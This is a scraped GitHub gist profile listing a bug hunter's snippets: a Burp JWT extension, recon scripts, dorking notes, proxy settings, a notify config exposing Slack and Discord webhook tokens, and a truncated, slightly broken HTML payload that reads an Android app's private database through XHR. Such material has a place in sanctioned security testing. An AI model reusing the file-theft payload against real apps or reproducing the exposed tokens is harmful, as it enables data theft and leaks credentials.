Skip to content

Instantly share code, notes, and snippets.

View balook's full-sized avatar

bala manohar surya sai balook

View GitHub Profile
@balook
balook / jwt header update.py
Last active May 1, 2022 08:48
jwt header update in electroneum (Custom Header For Macro - Body)
import json
import sys
from java.io import PrintWriter
from burp import IBurpExtender
from burp import IHttpRequestResponse
from burp import IHttpService
from burp import ISessionHandlingAction
import re
#Regex for extracting value of the token from the HTML Body

Keybase proof

I hereby claim:

  • I am balook on github.
  • I am balook (https://keybase.io/balook) on keybase.
  • I have a public key ASDoqBsHBUtytqNwL0Zq3T_4OJKk3B9w19MieIRkvkLc0Qo

To claim this, I am signing this object:

@balook
balook / notify.txt
Created November 5, 2020 01:44
notify project discovery tool conf file set
burp_biid: "123456798"
slack_webhook_url: https://hooks.slack.com/services/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
slack_username: prob
slack_channel: alert
slack: true
discord_webhook_url: https://discord.com/api/webhooks/763657778480414721/lZyZIbTFP9ZtL_0nPrUS9fGtsf-D4xPgCv_ESp4Olv4jMrCjv3YS608WIPJHxh-sxc8F
discord_username: fucker
<html>
<body onload="doAttack()">
<h1>Attack</h1>
<script>
// file path to steal
var target "file:///data/data/com.target.app/databases/target.db";
=
// get the contents of the target file by XHR
function doAttack() {
var xhr1 = new XMLHttpRequest();
@balook
balook / github-notes.md
Last active March 27, 2020 16:23
github-notes

github dorks Notes

Dorks list from gentelman Recon

zseano dorks

 "Comapany" [keyword] => /api, /internal/api, stag, swagger,dev,corp, apikey

 "company" path:/api
 "company" extension:php
@balook
balook / google-scope.md
Last active March 27, 2020 14:45
google scope data
@balook
balook / testing.md
Last active March 13, 2020 16:55
full of jokes
@balook
balook / small-recon
Created March 11, 2020 10:14
small-recon for subdomains only
#! /bin/bash
findomain -t $1 -q | tee $1.txt
subfinder -d $1 -silent | tee -a $1.txt
#crtsh
crtsh(){
curl -s https://crt.sh/?q\=%.$1\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}
@balook
balook / small-recon
Created March 11, 2020 10:14
small-recon for subdomains only
#! /bin/bash
findomain -t $1 -q | tee $1.txt
subfinder -d $1 -silent | tee -a $1.txt
#crtsh
crtsh(){
curl -s https://crt.sh/?q\=%.$1\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}
@balook
balook / foxy-proxy-pattern-settings
Created March 11, 2020 08:56
foxy-proxy-pattern settings
{
"import-2431382345": {
"title": "Burp_suite",
"type": 1,
"color": "#130001",
"address": "127.0.0.1",
"port": 8080,
"active": true,
"whitePatterns": [
{